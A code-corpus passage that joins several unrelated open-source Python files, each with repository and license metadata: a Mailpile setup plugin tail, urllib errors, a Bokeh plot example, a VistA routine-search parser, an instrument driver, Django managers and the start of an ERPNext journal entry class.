('crypto', lambda: config.prefs.gpg_recipient, SetupCrypto),
# Stage 2: Identity (via. single page install flow)
('profiles', lambda: self._check_profiles(config), Setup),
# Stage 3: Routes (via. single page install flow)
('routes', lambda: config.routes, Setup),
# Stage 4: Sources (via. single page install flow)
('sources', lambda: config.sources, Setup),
# Stage 5: Is All Complete
('complete', lambda: config.web.setup_complete, Setup),
# FIXME: Check for this too?
#(lambda: config.prefs.crypto_policy != 'none', SetupConfigureKey),
]
@classmethod
def Next(cls, config, default, needed_auth=True):
if not config.loaded_config:
return default
for name, guard, step in cls._CHECKPOINTS(config):
auth_required = (step.HTTP_AUTH_REQUIRED is True
or (config.prefs.gpg_recipient and
step.HTTP_AUTH_REQUIRED == 'Maybe'))
if not guard():
if (not needed_auth) or (not auth_required):
return step
return default
def setup_command(self, session):
if '_method' in self.data:
return self._success(_('Entering setup flow'), result=dict(
((c[0], c[1]() and True or False)
for c in self._CHECKPOINTS(session.config)
)))
else:
return SetupMagic.setup_command(self, session)
_ = gettext
_plugins.register_commands(SetupMagic,
SetupGetEmailSettings,
SetupWelcome,
SetupCrypto,
SetupProfiles,
SetupConfigureKey,
SetupTestRoute,
Setup)
|
laborautonomo/Mailpile
|
mailpile/plugins/setup_magic.py
|
Python
|
apache-2.0
| 40,094
|
"""Exception classes raised by urllib.
The base exception class is URLError, which inherits from IOError. It
doesn't define any behavior of its own, but is the base class for all
exceptions defined in this package.
HTTPError is an exception class that is also a valid HTTP response
instance. It behaves this way because HTTP protocol errors are valid
responses, with a status code, headers, and a body. In some contexts,
an application may want to handle an exception like a regular
response.
"""
import urllib.response
# do these error classes make sense?
# make sure all of the IOError stuff is overridden. we just want to be
# subtypes.
class URLError(IOError):
# URLError is a sub-type of IOError, but it doesn't share any of
# the implementation. need to override __init__ and __str__.
# It sets self.args for compatibility with other EnvironmentError
# subclasses, but args doesn't have the typical format with errno in
# slot 0 and strerror in slot 1. This may be better than nothing.
def __init__(self, reason, filename=None):
self.args = reason,
self.reason = reason
if filename is not None:
self.filename = filename
def __str__(self):
return '<urlopen error %s>' % self.reason
class HTTPError(URLError, urllib.response.addinfourl):
"""Raised when HTTP error occurs, but also acts like non-error return"""
__super_init = urllib.response.addinfourl.__init__
def __init__(self, url, code, msg, hdrs, fp):
self.code = code
self.msg = msg
self.hdrs = hdrs
self.fp = fp
self.filename = url
# The addinfourl classes depend on fp being a valid file
# object. In some cases, the HTTPError may not have a valid
# file object. If this happens, the simplest workaround is to
# not initialize the base classes.
if fp is not None:
self.__super_init(fp, hdrs, url, code)
def __str__(self):
return 'HTTP Error %s: %s' % (self.code, self.msg)
# since URLError specifies a .reason attribute, HTTPError should also
# provide this attribute. See issue13211 for discussion.
@property
def reason(self):
return self.msg
# exception raised when downloaded size does not match content-length
class ContentTooShortError(URLError):
def __init__(self, message, content):
URLError.__init__(self, message)
self.content = content
|
wdv4758h/ZipPy
|
lib-python/3/urllib/error.py
|
Python
|
bsd-3-clause
| 2,461
|
# -*- coding: utf-8 -*-
# Etalage-Passim -- Customization of Etalage for Passim
# By: Emmanuel Raviart <eraviart@easter-eggs.com>
#
# Copyright (C) 2011, 2012, 2013 Easter-eggs
# http://gitorious.org/passim/etalage-passim
#
# This file is part of Etalage-Passim.
#
# Etalage-Passim is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# Etalage-Passim is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Objects for subscribers, subscriptions, sites and users"""
from suq import monpyjama, representations
from . import conv
class Site(representations.UserRepresentable):
domain_name = None
from_bson = staticmethod(conv.check(conv.bson_to_site))
subscriptions = None
to_bson = conv.check(conv.site_to_bson)
url = None
class Subscriber(representations.UserRepresentable, monpyjama.Wrapper):
collection_name = 'subscribers'
emegalis = False
from_bson = staticmethod(conv.check(conv.bson_to_subscriber))
id = None
organization = None # Organism name
sites = None
territory_kind_code = None
to_bson = conv.check(conv.subscriber_to_bson)
users = None
@property
def territory(self):
from . import ramdb
if self.territory_kind_code is None:
return None
territory_id = ramdb.territory_id_by_kind_code.get((self.territory_kind_code['kind'],
self.territory_kind_code['code']))
if territory_id is None:
return None
return ramdb.territory_by_id.get(territory_id)
class Subscription(representations.UserRepresentable):
from_bson = staticmethod(conv.check(conv.bson_to_subscription))
id = None
options = None
territory_kind_code = None
to_bson = conv.check(conv.subscription_to_bson)
type = None
url = None
@property
def territory(self):
from . import ramdb
if self.territory_kind_code is None:
return None
territory_id = ramdb.territory_id_by_kind_code.get((self.territory_kind_code['kind'],
self.territory_kind_code['code']))
if territory_id is None:
return None
return ramdb.territory_by_id.get(territory_id)
class User(representations.UserRepresentable):
from_bson = staticmethod(conv.check(conv.bson_to_user))
to_bson = conv.check(conv.user_to_bson)
|
Gentux/etalage-passim
|
etalagepassim/subscribers.py
|
Python
|
agpl-3.0
| 2,843
|
"""
Given a string s, find the longest palindromic subsequence's length in s. You may assume that the maximum length of s is 1000.
Example 1:
Input:
"bbbab"
Output:
4
One possible longest palindromic subsequence is "bbbb".
Example 2:
Input:
"cbbd"
Output:
2
One possible longest palindromic subsequence is "bb".
Constraints:
1 <= s.length <= 1000
s consists only of lowercase English letters.
"""
class Solution:
def longestPalindromeSubseq(self, s: str) -> int:
n = len(s)
dp = [[1] * n for _ in range(n)]
for j in range(1, len(s)):
for i in reversed(range(0, j)):
if s[i] == s[j]:
dp[i][j] = 2 + dp[i + 1][(j - 1)] if i + 1 <= j - 1 else 2
else:
dp[i][j] = max(dp[i + 1][j], dp[i][(j - 1)])
return dp[0][(n-1)]
|
franklingu/leetcode-solutions
|
questions/longest-palindromic-subsequence/Solution.py
|
Python
|
mit
| 855
|
from __future__ import print_function
from bokeh.util.browser import view
from bokeh.document import Document
from bokeh.embed import file_html
from bokeh.models.glyphs import Circle
from bokeh.models import Plot, LinearAxis, Grid, ColumnDataSource, PanTool, WheelZoomTool, Title
from bokeh.resources import INLINE
from bokeh.sampledata.iris import flowers
colormap = {'setosa': 'red', 'versicolor': 'green', 'virginica': 'blue'}
flowers['color'] = flowers['species'].map(lambda x: colormap[x])
source = ColumnDataSource(
data=dict(
petal_length=flowers['petal_length'],
petal_width=flowers['petal_width'],
sepal_length=flowers['sepal_length'],
sepal_width=flowers['sepal_width'],
color=flowers['color']
)
)
plot = Plot(plot_width=800, plot_height=400)
plot.title.text = "Iris Data"
circle = Circle(
x="petal_length", y="petal_width", size=10,
fill_color="color", fill_alpha=0.2, line_color="color"
)
plot.add_glyph(source, circle)
xaxis = LinearAxis(axis_label="petal length", major_tick_in=0)
plot.add_layout(xaxis, 'below')
yaxis = LinearAxis(axis_label="petal width", major_tick_in=0)
plot.add_layout(yaxis, 'left')
plot.add_layout(Grid(dimension=0, ticker=xaxis.ticker))
plot.add_layout(Grid(dimension=1, ticker=yaxis.ticker))
plot.add_tools(PanTool(), WheelZoomTool())
# Add a caption as a title placed in "below" layout panel.
msg = """The Iris flower data set, or Fisher's Iris data set, is a multivariate data set introduced by Ronald Fisher in his 1936 paper."""
caption = Title(text=msg, align='left', text_font_size='10pt')
plot.add_layout(caption, 'below')
doc = Document()
doc.add_root(plot)
if __name__ == "__main__":
doc.validate()
filename = "iris.html"
with open(filename, "w") as f:
f.write(file_html(doc, INLINE, "Iris Data Scatter Example"))
print("Wrote %s" % filename)
view(filename)
|
mindriot101/bokeh
|
examples/models/file/iris.py
|
Python
|
bsd-3-clause
| 1,904
|
#---------------------------------------------------------------------------
# Copyright 2013 The Open Source Electronic Health Record Alliance
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#---------------------------------------------------------------------------
from __future__ import print_function
from builtins import range
import os,sys,argparse,re,fnmatch
from PatchInfoParser import installNameToDirName
from VistATestClient import VistATestClientFactory, createTestClientArgParser
routinefound = re.compile('^[A-Z0-9]+\.[A-Za-z]')
searchers=[]
# Search array is the properly escaped search strings from the Final Review
searcharray=['////','DIC\(0\)','\^UTILITY','\^TMP','\^XTMP','\%','\$I','U\=','K \^','\^\(','IO']
regexsearcharray=['////','DIC\(0\)','\^UTILITY','\^TMP','\^XTMP','\%','\$I','U\=','K \^','\^\(','S[:0-9A-Z=]* IO\=','K[:A-Z0-9=]* IO']
def findGTMRoutinesDir():
return os.getenv("gtmroutines").split(')')[0].split("(")[1]
def GTMRFind(outputDir,outputfilename,routineset):
outputfilepath = os.path.join(outputDir,outputfilename)
outputfile = open(outputfilepath,"w")
for searchstring in regexsearcharray:
searchers.append( re.compile(searchstring))
routinedir = findGTMRoutinesDir()
for root,dirnames,filenames in os.walk(routinedir):
for filename in fnmatch.filter(filenames,'*.m'):
routinename = filename.replace(".m","")
if routinename in routineset:
outputfile.write(filename+ "\n")
routine = open(routinedir+"/"+filename,'r')
for line in routine:
for index in range(0,len(regexsearcharray)):
if searchers[index].search(line):
outputfile.write(line)
def WriteRCheck(testClient,outputDir,filename,routinelist=['*']):
logpath = os.path.join(outputDir,"RCHECK.log")
testClient.setLogFile(logpath)
connection = testClient.getConnection()
testClient.waitForPrompt()
connection.send("DO ^%RCHECK\r")
for routine in routinelist:
connection.expect("Routine")
connection.send(routine+"\r")
connection.expect("Routine")
connection.send("\r")
index = connection.expect(["Device",testClient.getPrompt()])
if index == 0:
outputfile = os.path.join(outputDir,filename)
connection.send(outputfile + "\r")
connection.expect("Parameters")
connection.send("\r")
connection.expect([testClient.getPrompt(),"overwrite it"],600)
connection.send('\r')
testClient.waitForPrompt()
else:
print("No routines found for %RCheck")
connection.send("\r")
def WriteRFind(testClient,outputDir,filename,routinelist=['*']):
connection = testClient.getConnection()
testClient.waitForPrompt()
logpath = os.path.join(outputDir,"RFind.log")
testClient.setLogFile(logpath)
command = 'D ^%RFIND\r'
connection.send(command.replace('\\',''))
for searchstring in searcharray:
connection.expect("Search For")
connection.send(searchstring.replace('\\','')+"\r")
connection.expect("Search For")
connection.send("\r")
connection.expect("Exact Upper/Lowercase Match")
connection.send("\r")
connection.expect("Show all searched routines")
connection.send("\r")
for routine in routinelist:
connection.expect("Routine")
connection.send(routine+"\r")
connection.expect("Routine")
connection.send("\r")
index = connection.expect(["Device",testClient.getPrompt()])
if index ==0 :
outputfile = os.path.join(outputDir,filename)
connection.send(outputfile + "\r")
connection.expect("Parameters")
connection.send("\r")
connection.expect([testClient.getPrompt(),"overwrite it"],600)
connection.send("\r")
testClient.waitForPrompt()
else:
print("No Routines found for %RFIND")
connection.send("\r")
def XINDEXParser(outputDir,installname):
NEKsearchstring = "^>>"
Routinenamestring= "INDEX OF [A-Z0-9]"
sourcefile= os.path.join(outputDir,installNameToDirName(installname))
try:
NEKoutputDir= os.path.join(outputDir,"NotExplicitlyKilled")
os.mkdir(NEKoutputDir)
except:
pass
outputfile= os.path.join(NEKoutputDir,installNameToDirName(installname))
xindexoutput = open(sourcefile + ".log",'r')
notexplicitlykilled = open(outputfile + "NEK.log",'w')
for line in xindexoutput:
if re.search(Routinenamestring,line) or re.search(NEKsearchstring,line):
notexplicitlykilled.write(line + "\r")
elif re.search("CROSS-REFERENCING ALL ROUTINES",line):
break
def RFindParser(rfindinput,searchers,filearray,routineset=False):
routine=''
# Open the RFind output file and read each line
rfindfile=open(rfindinput,'r')
for line in rfindfile:
# If finding a line with a routine name, write out the status
if routinefound.search(line):
routine,ext = line.split('.')
# check to see if a routine set is given, and if the routine is in the set
if routine in routineset:
print("Writing findings for "+ routine)
else:
# Once a routine is found, check the next lines for the strings in the searcharray
for index in range(0,len(regexsearcharray)):
if searchers[index].search(line):
# If it matches and routine is in routine set, write to the correct file.
if routine in routineset:
filearray[index].write(routine+': '+line)
def RCheckParser(rcheckinput,outputDir,routineset):
rcheckfile=open(rcheckinput,'r')
rcheckresults = open(os.path.join(outputDir,"RCheckParsedresults.txt"),'w')
# Open the RCheck output file and read each line
for line in rcheckfile:
if routinefound.search(line):
# When a routinename is found, split over the extension to separate the
# routine name from the potential error
routine,errorline = line.split('.INT')
# Check for the routineset being passed and if the routine is in it.
if routine in routineset:
if re.search('Error [0-9]+',line):
rcheckresults.write(line)
print("An error has been found in " + routine)
def ParseOutput(outputDir,FindFile,CheckFile,RoutineSet):
filearray = [open(outputDir+'fourslash.txt','w'),open(outputDir+'dic0.txt','w'),open(outputDir+'utility.txt','w'),open(outputDir+'tmp.txt','w'),
open(outputDir+'xtmp.txt','w'),open(outputDir+'percent.txt','w'),open(outputDir+'dollari.txt','w'),open(outputDir+'uequals.txt','w'),
open(outputDir+'Kcarat.txt','w'),open(outputDir+'nakedreference.txt','w'),open(outputDir+'IOSet.txt','w'),open(outputDir+'IOKill.txt','w'),]
# Compile the regular expressions in the searcharray
for searchstring in regexsearcharray:
searchers.append( re.compile(searchstring))
#Parse only the files that are given in the command.
if FindFile:
RFindParser(FindFile,searchers,filearray,RoutineSet)
if CheckFile:
RCheckParser(CheckFile,outputDir,RoutineSet)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='RFind output parser for OTJ Final Review')
parser.add_argument('-rs', required=False, dest='routineset',
help='Directory which holds files of routines to limit search.')
parser.add_argument('-find', required=False, dest='Ffile',
help='Filepath to the Output file of the RFind function.')
parser.add_argument('-check', required=False, dest='Cfile',
help='Filepath to the Output file of the RCheck function.')
parser.add_argument('-o', required=False, dest='outputDir', default='',
help='Directory to store the output text files .')
result = vars(parser.parse_args())
ParseOutput(result['outputDir'],result['Ffile'],result['Cfile'],result['routineset'])
|
josephsnyder/VistA
|
Scripts/OTJParseEvidenceOutput.py
|
Python
|
apache-2.0
| 8,153
|
"""Script for generating annotated leaf."""
import argparse
import os
import logging
import json
from jicbioimage.core.io import AutoWrite
from jicbioimage.illustrate import AnnotatedImage
from utils import get_microscopy_collection
from parameters import Parameters
from surface import surface_from_stack
from projection import (
project_wall,
project_marker,
)
from geometry_mapper import original_image_point
__version__ = "0.1.0"
def save_annotated_leaf(input_dir, input_image, output_file, random, **kwargs):
"""Write out annotated leaf image."""
microscopy_collection = get_microscopy_collection(input_image)
wall_stack = microscopy_collection.zstack(c=kwargs["wall_channel"])
surface = surface_from_stack(wall_stack, **kwargs)
wall_projection = project_wall(wall_stack, surface, **kwargs)
marker_stack = microscopy_collection.zstack(c=kwargs["marker_channel"])
# Refactor with analysis script to ensure always in sync.
marker_projection = project_marker(marker_stack, surface, **kwargs)
wall_ann = AnnotatedImage.from_grayscale(wall_projection, (1, 0, 0))
marker_ann = AnnotatedImage.from_grayscale(marker_projection, (0, 1, 0))
ann = wall_ann + marker_ann
json_fpaths = [os.path.join(input_dir, f)
for f in os.listdir(input_dir)
if f.endswith(".json")]
y_key = "normalised_marker_y_coord"
x_key = "normalised_marker_x_coord"
for fpath in json_fpaths:
with open(fpath) as fh:
celldata = json.load(fh)
if y_key not in celldata:
continue
if x_key not in celldata:
continue
print(fpath)
frac_pt = celldata[y_key], celldata[x_key]
rel_pt = tuple([i - 0.5 for i in frac_pt])
rotation = celldata["rotation"]
if random:
rotation = 0
marker_pt = original_image_point(rel_point=rel_pt,
rotation=rotation,
ydim=celldata["ydim"],
xdim=celldata["xdim"],
dy_offset=celldata["dy_offset"],
dx_offset=celldata["dx_offset"])
ann.draw_line(marker_pt, celldata["centroid"], (255, 255, 255))
ann.draw_cross(celldata["centroid"], (255, 255, 255))
with open(output_file, "wb") as fh:
fh.write(ann.png())
def main():
# Parse the command line arguments.
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("input_dir", help="Input directory (with json files)")
parser.add_argument("input_image", help="Input image")
parser.add_argument("parameters_file", help="Parameters file")
parser.add_argument("output_file", help="Output file")
parser.add_argument("--random", action="store_true", help="Use random rotation")
args = parser.parse_args()
# Check that the input directory and files exists.
if not os.path.isdir(args.input_dir):
parser.error("{} not a directory".format(args.input_dir))
if not os.path.isfile(args.input_image):
parser.error("{} not a file".format(args.input_image))
if not os.path.isfile(args.parameters_file):
parser.error("{} not a file".format(args.parameters_file))
# Read in the parameters.
params = Parameters.from_file(args.parameters_file)
# Don't write out intermediate images.
AutoWrite.on = False
# Setup a logger for the script.
log_fname = "audit.log"
log_fpath = log_fname
logging_level = logging.INFO
logging.basicConfig(filename=log_fpath, level=logging_level)
# Log some basic information about the script that is running.
logging.info("Script name: {}".format(__file__))
logging.info("Script version: {}".format(__version__))
logging.info("Parameters: {}".format(params))
# Run the analysis.
save_annotated_leaf(args.input_dir, args.input_image, args.output_file,
args.random, **params)
if __name__ == "__main__":
main()
|
JIC-Image-Analysis/cells-from-leaves
|
scripts/leaf_annotation.py
|
Python
|
mit
| 4,107
|
# Copyright (c) 2020 kamyu. All rights reserved.
#
# Google Code Jam 2014 Qualification Round - Problem A. Magic Trick
# https://code.google.com/codejam/contest/2974486/dashboard#s=p0
#
# Time: O(1)
# Space: O(1)
#
def magic_trick():
ANS, ARR = [0]*2, [[] for _ in xrange(2)]
for i in xrange(2):
ANS[i] = input()-1
for _ in xrange(4):
ARR[i].append(raw_input().strip().split())
result = set(ARR[0][ANS[0]]) & set(ARR[1][ANS[1]])
if not result:
return "Volunteer cheated!"
if len(result) > 1:
return "Bad magician!"
return result.pop()
for case in xrange(input()):
print 'Case #%d: %s' % (case+1, magic_trick())
|
kamyu104/GoogleCodeJam-2014
|
Qualification Round/magic_trick.py
|
Python
|
mit
| 686
|
# Generated by Django 2.1.5 on 2019-06-07 13:51
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('validation', '0004_auto_20190607_1314'),
]
operations = [
migrations.AlterField(
model_name='flagged',
name='flg_dataset',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='flagged', to='coadd.Dataset'),
),
]
|
linea-it/dri
|
api/validation/migrations/0005_auto_20190607_1351.py
|
Python
|
gpl-3.0
| 503
|
"""
Python Interchangeable Virtual Instrument Library
Copyright (c) 2013-2016 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from .rigolDP800 import *
class rigolDP832A(rigolDP800):
"Rigol DP832A IVI DC power supply driver"
def __init__(self, *args, **kwargs):
self.__dict__.setdefault('_instrument_id', 'DP832A')
super(rigolDP832A, self).__init__(*args, **kwargs)
self._output_count = 3
self._output_spec = [
{
'range': {
'P30V': (30.0, 3.0)
},
'ovp_max': 33.0,
'ocp_max': 3.3,
'voltage_max': 30.0,
'current_max': 3.0
},
{
'range': {
'P30V': (30.0, 3.0)
},
'ovp_max': 33.0,
'ocp_max': 3.3,
'voltage_max': 30.0,
'current_max': 3.0
},
{
'range': {
'P5V': (5.0, 3.0)
},
'ovp_max': 5.5,
'ocp_max': 3.3,
'voltage_max': 5.0,
'current_max': 3.0
}
]
self._init_outputs()
|
Diti24/python-ivi
|
ivi/rigol/rigolDP832A.py
|
Python
|
mit
| 2,291
|
from django.db import models
from django.contrib.auth.models import User
import time
class ArtistManager(models.Manager):
def validate(self):
"""
Validate invalid artists.
"""
qs = self.get_query_set().filter(is_valid=False)
if qs.update(is_valid=True):
return True
def invalid_artists(self):
"""
Return artists that are marked is_valid = False
"""
return self.get_query_set().filter(is_valid=False)
def dmca_artists(self):
"""
Return artists that are marked dmca.
"""
return self.get_query_set().filter(is_dmca=True)
def valid_artists(self):
"""
Return artists that are marked is_valid = True
"""
return self.get_query_set().filter(is_valid=True)
def no_albums(self):
"""
Return valid artists with no albums.
"""
return (artist for artist in self.get_query_set().valid_artists() if artist.albums.exists())
def has_albums(self):
"""
Return valid artists with albums.
"""
return (artist for artist in self.get_query_set().valid_artists() if not artist.albums.exists())
def no_tags(self):
"""
Return valid artists with no tags.
"""
no_tags = []
artists = self.valid_artists()
for artist in artists:
if not artist.tags.all(): no_tags.append(artist)
return no_tags
class AlbumManager(models.Manager):
def invalid_albums(self):
"""
Return albums that are marked is_valid = False
"""
return self.get_query_set().filter(is_valid=False)
def valid_albums(self):
"""
Return albums that are marked is_valid = True
"""
return self.get_query_set().filter(is_valid=True)
def latest_with_links(self):
"""
Return latest albums with links.
"""
latest = []
albums = self.valid_albums().order_by('-created').filter()
for album in albums:
if album.link_set.all():
latest.append(album)
return latest[:10]
def popular_uploaders(self, number=10):
"""
Returns a list of 10 of the most popular album uploaders.
"""
d = {}
albums = self.get_query_set().all()
for album in albums:
if album.user:
d[album.user.username] = album.user.album_set.count()
if number == 0:
return [album for album in reversed(sorted(d.items(), key=lambda (k,v): (v,k)))]
return [album for album in reversed(sorted(d.items(), key=lambda (k,v): (v,k)))][:number]
class LinkManager(models.Manager):
def reported_links(self, number=None):
"""
Returns all reported links, by default it returns all which have been reported at least once.
If "number" is provided, it returns links reported = number.
"""
if number:
return self.get_query_set().filter(reported__exact=number)
return self.get_query_set().filter(reported__gte=1)
def popular_uploaders(self, number=10):
"""
Returns a list of 10 of the most popular link uploaders.
"""
d = {}
for link in self.get_query_set():
if d.has_key(link.user.username):
d[link.user.username] = d[link.user.username]+1
else:
d[link.user.username] = 1
if number == 0:
return [link for link in sorted(d.items(), key=lambda (k,v): (v,k))]
return [link for link in sorted(d.items(), key=lambda (k,v): (v,k))]#[:number]
|
tsoporan/tehorng
|
submissions/managers.py
|
Python
|
agpl-3.0
| 3,158
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import cstr, flt, fmt_money, formatdate
from frappe import msgprint, _, scrub
from erpnext.controllers.accounts_controller import AccountsController
from erpnext.accounts.utils import get_balance_on, get_account_currency
from erpnext.accounts.party import get_party_account_currency
from erpnext.setup.utils import get_company_currency
class JournalEntry(AccountsController):
def __init__(self, arg1, arg2=None):
super(JournalEntry, self).__init__(arg1, arg2)
def get_feed(self):
return self.voucher_type
def validate(self):
if not self.is_opening:
self.is_opening='No'
self.clearance_date = None
super(JournalEntry, self).validate_date_with_fiscal_year()
self.validate_party()
self.validate_cheque_info()
self.validate_entries_for_advance()
self.validate_multi_currency()
self.validate_debit_and_credit()
self.validate_against_jv()
self.validate_reference_doc()
self.set_against_account()
self.create_remarks()
self.set_print_format_fields()
self.validate_expense_claim()
self.validate_credit_debit_note()
self.validate_empty_accounts_table()
self.set_account_and_party_balance()
self.set_title()
def on_submit(self):
self.check_credit_limit()
self.make_gl_entries()
self.update_advance_paid()
self.update_expense_claim()
def set_title(self):
self.title = self.pay_to_recd_from or self.accounts[0].account
def update_advance_paid(self):
advance_paid = frappe._dict()
for d in self.get("accounts"):
if d.is_advance:
if d.reference_type in ("Sales Order", "Purchase Order"):
advance_paid.setdefault(d.reference_type, []).append(d.reference_name)
for voucher_type, order_list in advance_paid.items():
for voucher_no in list(set(order_list)):
frappe.get_doc(voucher_type, voucher_no).set_total_advance_paid()
def on_cancel(self):
from erpnext.accounts.utils import remove_against_link_from_jv
remove_against_link_from_jv(self.doctype, self.name)
self.make_gl_entries(1)
self.update_advance_paid()
self.update_expense_claim()
def validate_party(self):
for d in self.get("accounts"):
account_type = frappe.db.get_value("Account", d.account, "account_type")
if account_type in ["Receivable", "Payable"]:
if not (d.party_type and d.party):
frappe.throw(_("Row {0}: Party Type and Party is required for Receivable / Payable account {1}").format(d.idx, d.account))
elif d.party_type and d.party:
frappe.throw(_("Row {0}: Party Type and Party is only applicable against Receivable / Payable account").format(d.idx))
def check_credit_limit(self):
customers = list(set([d.party for d in self.get("accounts")
if d.party_type=="Customer" and d.party and flt(d.debit) > 0]))
if customers:
from erpnext.selling.doctype.customer.customer import check_credit_limit
for customer in customers:
check_credit_limit(customer, self.company)
def validate_cheque_info(self):
if self.voucher_type in ['Bank Entry']:
if not self.cheque_no or not self.cheque_date:
msgprint(_("Reference No & Reference Date is required for {0}").format(self.voucher_type),
raise_exception=1)
if self.cheque_date and not self.cheque_no:
msgprint(_("Reference No is mandatory if you entered Reference Date"), raise_exception=1)
def validate_entries_for_advance(self):
for d in self.get('accounts'):
if d.reference_type not in ("Sales Invoice", "Purchase Invoice", "Journal Entry"):
if (d.party_type == 'Customer' and flt(d.credit) > 0) or \
(d.party_type == 'Supplier' and flt(d.debit) > 0):
if d.is_advance=="No":
msgprint(_("Row {0}: Please check 'Is Advance' against Account {1} if this is an advance entry.").format(d.idx, d.account))
elif d.reference_type in ("Sales Order", "Purchase Order") and d.is_advance != "Yes":
frappe.throw(_("Row {0}: Payment against Sales/Purchase Order should always be marked as advance").format(d.idx))
def validate_against_jv(self):
for d in self.get('accounts'):
if d.reference_type=="Journal Entry":
account_root_type = frappe.db.get_value("Account", d.account, "root_type")
if account_root_type == "Asset" and flt(d.debit) > 0:
frappe.throw(_("For {0}, only credit accounts can be linked against another debit entry")
.format(d.account))
elif account_root_type == "Liability" and flt(d.credit) > 0:
frappe.throw(_("For {0}, only debit accounts can be linked against another credit entry")
.format(d.account))
if d.reference_name == self.name:
frappe.throw(_("You can not enter current voucher in 'Against Journal Entry' column"))
against_entries = frappe.db.sql("""select * from `tabJournal Entry Account`
where account = %s and docstatus = 1 and parent = %s
and ifnull(reference_type, '') in ("", "Sales Order", "Purchase Order")
""", (d.account, d.reference_name), as_dict=True)
if not against_entries:
frappe.throw(_("Journal Entry {0} does not have account {1} or already matched against other voucher")
.format(d.reference_name, d.account))
else:
dr_or_cr = "debit" if d.credit > 0 else "credit"
valid = False
for jvd in against_entries:
if flt(jvd[dr_or_cr]) > 0:
valid = True
if not valid:
frappe.throw(_("Against Journal Entry {0} does not have any unmatched {1} entry")
.format(d.reference_name, dr_or_cr))
def validate_reference_doc(self):
"""Validates reference document"""
field_dict = {
'Sales Invoice': ["Customer", "Debit To"],
'Purchase Invoice': ["Supplier", "Credit To"],
'Sales Order': ["Customer"],
'Purchase Order': ["Supplier"]
}
self.reference_totals = {}
self.reference_types = {}
self.reference_accounts = {}
for d in self.get("accounts"):
if not d.reference_type:
d.reference_name = None
if not d.reference_name:
d.reference_type = None
if d.reference_type and d.reference_name and (d.reference_type in field_dict.keys()):
dr_or_cr = "credit_in_account_currency" \
if d.reference_type in ("Sales Order", "Sales Invoice") else "debit_in_account_currency"
# check debit or credit type Sales / Purchase Order
if d.reference_type=="Sales Order" and flt(d.debit) > 0:
frappe.throw(_("Row {0}: Debit entry can not be linked with a {1}").format(d.idx, d.reference_type))
if d.reference_type == "Purchase Order" and flt(d.credit) > 0:
frappe.throw(_("Row {0}: Credit entry can not be linked with a {1}").format(d.idx, d.reference_type))
# set totals
if not d.reference_name in self.reference_totals:
self.reference_totals[d.reference_name] = 0.0
self.reference_totals[d.reference_name] += flt(d.get(dr_or_cr))
self.reference_types[d.reference_name] = d.reference_type
self.reference_accounts[d.reference_name] = d.account
against_voucher = frappe.db.get_value(d.reference_type, d.reference_name,
[scrub(dt) for dt in field_dict.get(d.reference_type)])
# check if party and account match
if d.reference_type in ("Sales Invoice", "Purchase Invoice"):
if (against_voucher[0] != d.party or against_voucher[1] != d.account):
frappe.throw(_("Row {0}: Party / Account does not match with {1} / {2} in {3} {4}")
.format(d.idx, field_dict.get(d.reference_type)[0], field_dict.get(d.reference_type)[1],
d.reference_type, d.reference_name))
# check if party matches for Sales / Purchase Order
if d.reference_type in ("Sales Order", "Purchase Order"):
# set totals
if against_voucher != d.party:
frappe.throw(_("Row {0}: {1} {2} does not match with {3}") \
.format(d.idx, d.party_type, d.party, d.reference_type))
self.validate_orders()
self.validate_invoices()
def validate_orders(self):
"""Validate totals, stopped and docstatus for orders"""
for reference_name, total in self.reference_totals.iteritems():
reference_type = self.reference_types[reference_name]
account = self.reference_accounts[reference_name]
if reference_type in ("Sales Order", "Purchase Order"):
order = frappe.db.get_value(reference_type, reference_name,
["docstatus", "per_billed", "status", "advance_paid",
"base_grand_total", "grand_total", "currency"], as_dict=1)
if order.docstatus != 1:
frappe.throw(_("{0} {1} is not submitted").format(reference_type, reference_name))
if flt(order.per_billed) >= 100:
frappe.throw(_("{0} {1} is fully billed").format(reference_type, reference_name))
if cstr(order.status) == "Stopped":
frappe.throw(_("{0} {1} is stopped").format(reference_type, reference_name))
account_currency = get_account_currency(account)
if account_currency == self.company_currency:
voucher_total = order.base_grand_total
else:
voucher_total = order.grand_total
if flt(voucher_total) < (flt(order.advance_paid) + total):
frappe.throw(_("Advance paid against {0} {1} cannot be greater \
than Grand Total {2}").format(reference_type, reference_name, voucher_total))
def validate_invoices(self):
